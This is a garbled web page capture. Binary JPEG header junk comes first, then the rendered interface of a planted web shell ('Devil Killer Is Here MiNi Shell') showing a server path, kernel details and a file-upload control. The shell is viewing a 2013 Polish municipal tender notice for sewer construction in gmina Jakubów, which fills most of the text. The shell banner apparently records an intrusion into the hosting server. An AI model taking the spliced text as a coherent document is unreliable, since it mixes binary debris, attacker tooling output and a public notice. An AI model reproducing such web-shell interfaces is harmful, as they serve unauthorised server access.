JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130311/96034-N-2013.html

<p class="kh_header"><b>Jakubów: Przetarg nieograniczony na roboty budowlane  pn.   Budowa sieci kanalizacji sanitarnej wraz z przepompowniami w miejscowościach Jędrzejów Nowy i Jędrzejów Stary  gmina Jakubów</b><br>
<b>Numer ogłoszenia: 96034 - 2013; data zamieszczenia: 11.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Jakubów , Jakubów 55, 05-306 Jakubów, woj. mazowieckie, tel. 025 7579190, faks 025 7579190.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.jakubow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na roboty budowlane  pn.   Budowa sieci kanalizacji sanitarnej wraz z przepompowniami w miejscowościach Jędrzejów Nowy i Jędrzejów Stary  gmina Jakubów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: Budowa sieci kanalizacji sanitarnej wraz z   
    przepompowniami w miejscowościach Jędrzejów Nowy i Jędrzejów Stary  gmina   
    Jakubów.
Zakres robót objętych ST
Ustalenia zawarte w niniejszej specyfikacji dotyczą zasad prowadzenia robót związanych z wykonaniem kanalizacji sanitarnej. Zakres stosowania dotyczy wszystkich czynności umożliwiających i mających na celu budowę sieci kanalizacyjnej łącznie z wykonaniem przepompowni ścieków 
Ogólne zestawienie zakresu rzeczowego robót:
a)kanał ściekowy PVC O 200 mm - L = 8503 m
b)kanał ściekowy PVC O 250 mm - L = 741 m
c)kanał ściekowy PVC O 315 mm - L = 70 m
d)studnie rewizyjne bet. O 1200 mm - 1 szt.
e)studnie rewizyjne PE O 1000 mm - 104 szt.
f)studnie rewizyjne PP O 425 m - 181 szt.
g)studnie rewizyjne PP O 315 m - 127 szt.
h)przepompownia ścieków - 3 szt.
i)rurociąg tłoczny PE HD O 90 mm - 1622 m
przejścia pod jezdnią asfaltową
j)przewierty w rurach osł. DN 355 mm - 10 m - 1 szt.
k)przewierty w rurach osł. DN 300 mm - 143 m - 6 szt.
l)przeciski w rurach osł. DN 300 mm - 101 m - 7 szt.

Inwestycja realizowana  będzie  na działkach  o numerze ewidencyjnym :
a) w miejscowości  Jędrzejów Nowy - obręb 0017
435/4, 588, 63, 315, 95/2, 187, 212, 226, 254, 284, 294, 474, 506, 539, 72, 153, 157, 193, 194, 195/1, 195/2, 196/1, 196/2, 199, 206/2, 207, 208, 209, 210/2, 210/4, 227/2, 253, 256/2, 262/6, 262/8, 261/8, 261/9, 261/10, 276/1, 277/10, 278/2, 279,  280/1, 280/2, 280/4, 281/3, 283/3, 282/3, 82, 304, 305, 306, 307, 308, 309, 469, 470, 472,  476/3, 479, 480/1, 481, 482/1, 482/2, 483, 484/1, 484/2, 485/1, 485/2, 486, 487, 488, 490, 495/1, 496, 497, 498/1, 498/2, 499/1, 500, 501, 502, 517, 518, 519, 540/1, 541, 211, 590, 

b) w miejscowości   Jędrzejów Stary - obręb 0020
294/4, 295, 296, 297/2, 298/2, 393, 394/3, 395, 397, 398, 

Uwaga: Wykonawca powinien posiadać sprzęt  do wykonywania wykopów:
a)pod kanał sanitarny ponad 4 m, 
b)pompowni ponad 6 m  oraz posiadać osprzęt do odwadniania wykopów.
2. Zamawiający wymaga od Wykonawcy udzielenia gwarancji jakości na zrealizowany 
    przedmiot zamówienia, w tym na:
a.	wykonane roboty budowlane - 36 miesięcy
b.	 zamontowane urządzenia - 36 miesięcy
Okres gwarancji liczony będzie od dnia odebrania przez Zamawiającego robót budowlanych i  podpisania bez uwag protokołu odbioru końcowego przedmiotu zamówienia.
3. Szczegółowy zakres i opis przedmiotu zamówienia określony jest w:
a.	dokumentacji projektowej- Załącznik  SIWZ
b.	Specyfikacji Technicznej  zawierającej zbiory wymagań w zakresie wykonania robót budowlanych, właściwości materiałów i urządzeń oraz wymagania w zakresie prawidłowości wykonania poszczególnych robót - Załącznik  do SIWZ
c.	przedmiarach robót - Załącznik  do SIWZ 
4. Jeżeli w jakimkolwiek miejscu SIWZ oraz w załącznikach do niej przy opisywaniu 
    przedmiotu zamówienia Zamawiający użył znaków towarowych i nazw producentów, 
    należy je traktować wyłącznie jako przykładowe. Wymienione znaki towarowe, 
    patenty lub pochodzenie materiałów czy urządzeń służących do wykonania niniejszego 
    zamówienia służą wyłącznie doprecyzowaniu przedmiotu zamówienia. Zamawiający 
    dopuszcza zastosowanie urządzeń równoważnych. Wszelkie materiały i urządzenia 
    określone w Specyfikacji Istotnych Warunków Zamówienia pochodzące od 
    konkretnych producentów lub ze wskazaną marką albo patentem, określają wymagane 
    przez Zamawiającego parametry techniczne, jakościowe i użytkowe, jakim muszą 
    odpowiadać materiały/urządzenia oferowane, aby spełnić wymagania stawiane przez 
    Zamawiającego. 
   Ciężar udowodnienia, że materiał lub urządzenie jest równoważne w stosunku do   
   wymogu określonego przez Zamawiającego spoczywa na Wykonawcy.
   Wykonawca, który zamierza zastosować materiały lub urządzenia równoważne 
   obowiązany jest w ofercie wskazać, które oferowane urządzenia lub/i materiały zostały 
   zaoferowane jako równoważne oraz załączyć do oferty stosowne, potwierdzone przez 
   producenta, dokumenty określające dane techniczne w zakresie odpowiadającym 
   parametrom materiałów/urządzeń zaprojektowanych (np.: specyfikacje i karty 
   techniczne) oraz wymagane prawem certyfikaty lub inne dokumenty dopuszczające 
   dane materiały.
   Zamawiający zastrzega sobie prawo do oceny równoważności proponowanych 
   rozwiązań. Zamawiający zastrzega sobie także prawo do korzystania z opinii 
   ekspertów.
   
   Brak wskazania w załączniku propozycji zastosowania rozwiązań równoważnych   
   oznaczać będzie deklarację wykonawcy, że przedmiot zamówienia zostanie wykonany 
   przy zastosowaniu urządzeń i materiałów określonych w SIWZ. 
   Wykonawca składający ofertę zawierającą rozwiązania równoważne ponosi pełną 
   odpowiedzialność za prawidłowe funkcjonowanie rozwiązań technicznych. 
   Jeżeli materiały lub,i urządzenia zaoferowane przez Wykonawcę jako równoważne nie  
   będą równoważne do określonych w dokumentacji projektowej i Specyfikacji 
   Technicznej w świetle przedłożonych przez Wykonawcę dokumentów, oferta tego 
   Wykonawcy zostanie odrzucona jako nie odpowiadająca treści SIWZ.
Dokumentacja techniczna dostępna jest również  do wglądu w Urzędzie Gminy w dniach poniedziałek - piątek w godz. 800 - 1500.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.11-6, 45.23.21.50-8, 45.23.24.52-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy Wykonawca zobowiązany jest wnieść przed upływem terminu składania ofert,  
    wadium  w wysokości: 132 000 PLN słownie: Sto trzydzieści dwa tysiące złotych.
2. Wadium wnosi się przed upływem terminu składania ofert, tj. do dnia 27 marca 2013 
     roku, przed godz. 10:30. 
3. Wadium może być wnoszone w następujących formach:
     a) pieniądzu;
     b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - 
          kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
     c) gwarancjach bankowych;
     d)  gwarancjach ubezpieczeniowych;
     e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 
         ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju 
         Przedsiębiorczości (Dz. U. Nr 109 poz. 1158 z późn. zm.)
4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy na konto 
     Zamawiającego: Urząd Gminy Jakubów  Bank Spółdzielczy O/Jakubów  90 9226  
     0005 0050 0294 2000 0070  z dopiskiem Wadium- Budowa sieci kanalizacji 
     sanitarnej wraz z przepompowniami w miejscowościach Jędrzejów Nowy i 
     Jędrzejów Stary  gmina Jakubów
     Do oferty należy dołączyć kserokopię dowodu przelewu potwierdzającego wniesienie 
      wadium.
5. W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu 
     potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania 
     ofert w siedzibie Zamawiającego w Urzędzie Gminy w Jakubowie, 05-306 Jakubów 
     55 pok. Nr 1  lub dołączyć do oferty (w sposób umożliwiający wypięcie i przekazanie 
     do kasy). Kopia potwierdzająca wniesienie wadium winna być dołączona do oferty.
6.  Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które 
     znajdzie się na rachunku bankowym Zamawiającego najpóźniej przed upływem   
     terminu na składania ofert, tj. do dnia 27 marca 2013 roku do godz. 1030.
     Wadium musi obejmować termin związania ofertą.
7. Nie wniesienie wadium w terminie lub w inny sposób niż określony w SiWZ 
     spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy, a jego 
     oferta zostanie odrzucona na podstawie art. 24 ust. 4 ustawy.
8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta  
     została wybrana:
     - odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
        określonych w ofercie;
     - nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
     - zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z  
       przyczyn leżących po stronie wykonawcy.
9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi 
    na wezwanie, o którym mowa w art. 26  ust. 3 ustawy, nie złożył dokumentów lub 
    oświadczeń, o których mowa w art.25 ust. 1 ustawy, lub pełnomocnictw, chyba że 
    udowodni, że wynika to z przyczyn nieleżących po jego stronie.
10. Pozostałe warunki dotyczące wadium określone są w art. 45 i 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie oświadczenia oferenta .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie wykazu robót budowlanych wykonanych  w okresie ostatnich pięciu lat przed upływem 
    terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a  
    jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich 
    rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów    
   dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w 
   sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki 
    budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych   
     wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z 
     informacją o podstawie do dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności   
     odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami   
     budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, 
     doświadczenia i  wykształcenia niezbędnych do wykonania zamówienia , a także   
     zakresu wykonywanych przez  nie czynności, oraz informacją o podstawie do 
     dysponowania tymi osobami,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej,   
    potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową 
    wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu 
    składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o 
     udzielenie zamówienia. Informacja ma potwierdzić posiadanie środków finansowych 
     lub zdolność kredytową w wysokości  równoważnej do przedmioty zamówienia oraz opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający, że     wykonawca    jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  działalności związanej z przedmiotem zamówienia na kwotę równoważną do przedmiotu zamówiena.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony druk oferty, listę podwykonawców, listę podmiotów należących do tej samej grupy kapitałowej, kosztorys ofertowy, parafowany wzór umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jakubow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jakubów, Jakubów 55, 05-306 Jakubów pok. Nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2013 godzina 10:30, miejsce: Urząd Gminy Jakubów, Jakubów 55, 05-306 Jakubów pok. Nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




